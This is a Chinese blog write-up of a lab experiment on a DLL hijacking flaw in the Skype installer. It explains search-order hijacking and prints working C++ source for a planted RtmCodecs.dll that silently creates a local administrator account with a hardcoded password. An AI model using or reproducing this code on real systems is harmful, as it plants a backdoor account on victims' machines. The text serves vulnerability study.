标签:
0x1:实验背景
看到国外一篇文章,大致描述如下:
Hi, There are a dll planting vuln in skype installer. This vuln had been reported to Microsoft but they decided not fix this. Here is the vulnerability details: ------ Skype installer in Windows is open to DLL hijacking. Skype looks for a specific DLL by dynamically going through a set of predefined directories. One of the directory being scanned is the installation directory, and this is exactly what is abused in this vulnerability.
根据描述我们可以知道skype存在dll劫持漏洞,在试验中需要劫持的dll为RtmCodecs.dll,接下来我们开始试验。
0x2: dll劫持原理
由于输入表中只包含DLL名而没有它的路径名,因此加载程序必须在磁盘上搜索DLL文件。首先会尝试从当前程序所在的目录加载DLL,如果没找到,则在Windows系统目录中查找,最后是在环境变量中列出的各个目录下查找。利用这个特点,先伪造一个系统同名的DLL,提供同样的输出表,每个输出函数转向真正的系统DLL。程序调用系统DLL时会先调用当前目录下伪造的DLL,完成相关功能后,再跳到系统DLL同名函数里执行。这个过程用个形象的词来描述就是系统DLL被劫持(hijack)了。
0x3:实验过程
(1) 编写一个劫持指定dll程序原理
1.查看被劫持的DLL的导出函数表。 2.编程实现劫持DLL向原DLL的导出函数的转发,并加入你的“恶意代码”。
(2) 由于文章里给出一个弹出会话框功能的dll,这里我们先看看作者怎么实现的。
从上图可以看出,作者直接在DLL入口执行一个msaageBox函数 弹出对话框。我们也这样实现一个函数添加用户试试,主要代码如下
msi.h
#pragma once #ifdef DLLEXPORT #define DLL_INTERFACE __declspec(dllexport) #else #define DLL_INTERFACE __declspec(dllimport) #endif extern "C"{ DLL_INTERFACE void adduser(); }
msi.cpp
// msi.cpp : 定义 DLL 应用程序的导出函数。 // #include "stdafx.h" #define DLLEXPORT #include "msi.h" DLL_INTERFACE void adduser() { NET_API_STATUS nStatus; DWORD dwError = 0; DWORD dwLevel = 1; USER_INFO_1 ui; ui.usri1_name = L"iiis"; //用户名 ui.usri1_password = L"password123!@#"; //密码 //ui.usri1_name = argv[1]; //ui.usri1_password = argv[1]; ui.usri1_priv = USER_PRIV_USER; //权限 ui.usri1_home_dir = NULL; ui.usri1_comment = NULL; ui.usri1_flags = UF_SCRIPT|UF_DONT_EXPIRE_PASSWD|UF_PASSWD_CANT_CHANGE; //登录脚本执行,密码不可更改,密码永不过期 ui.usri1_script_path = NULL; nStatus = NetUserAdd( NULL, dwLevel, (LPBYTE)&ui, &dwError ); if ( nStatus == NERR_Success || nStatus == NERR_UserExists ) { std::cout << "add user success" << std::endl; } else { std::cout << "add user failed: " << nStatus << std::endl; exit(-1); } LOCALGROUP_MEMBERS_INFO_3 account; account.lgrmi3_domainandname=ui.usri1_name; //传入用户名 nStatus = NetLocalGroupAddMembers( NULL, L"Administrators", 3, (LPBYTE)&account, 1); if ( nStatus == NERR_Success ) { std::cout << "add localgroup success" << std::endl; } else { std::cout << "add localgroup failed: " << nStatus << std::endl; exit(-1); } __asm JMP EAX; // 初次测试没有这一句 }
编译,放进skpye的phone目录替换RtmCodecs.dll,然后启动skype,如图:
劫持成功,但是skype崩溃掉了,分析一下原因,大概是没有实现劫持DLL向原DLL的导出函数的转发导致的,但是作者也没有这样实现怎么就不崩溃呢,于是反编译了一下skype原RtmCodecs.dll看看导出函数是长啥样的,如下图:
结合IDA里面执行完messageBox函数后的eax清零操作,大概了解,应该在Adduser()执行完毕后对返回进行一下处理,于是在Adduser()函数体末尾添加
__asm JMP EAX;
指令,再编译测试,如下图:
成功劫持并添加用户,skype也没有崩溃。
0x4 后记:
上述就是整个实验过程,当然在劫持指定dll的时候,为了程序能正常使用按照编写一个劫持指定dll程序原理去实现效果最好,在本次试验中,这个过程忽略了。
0x5 参考:
1. http://www.exploitalert.com/view-details.html?id=24885
2. http://www.freebuf.com/articles/78807.html
标签:
原文地址:http://www.cnblogs.com/persuit/p/5924156.html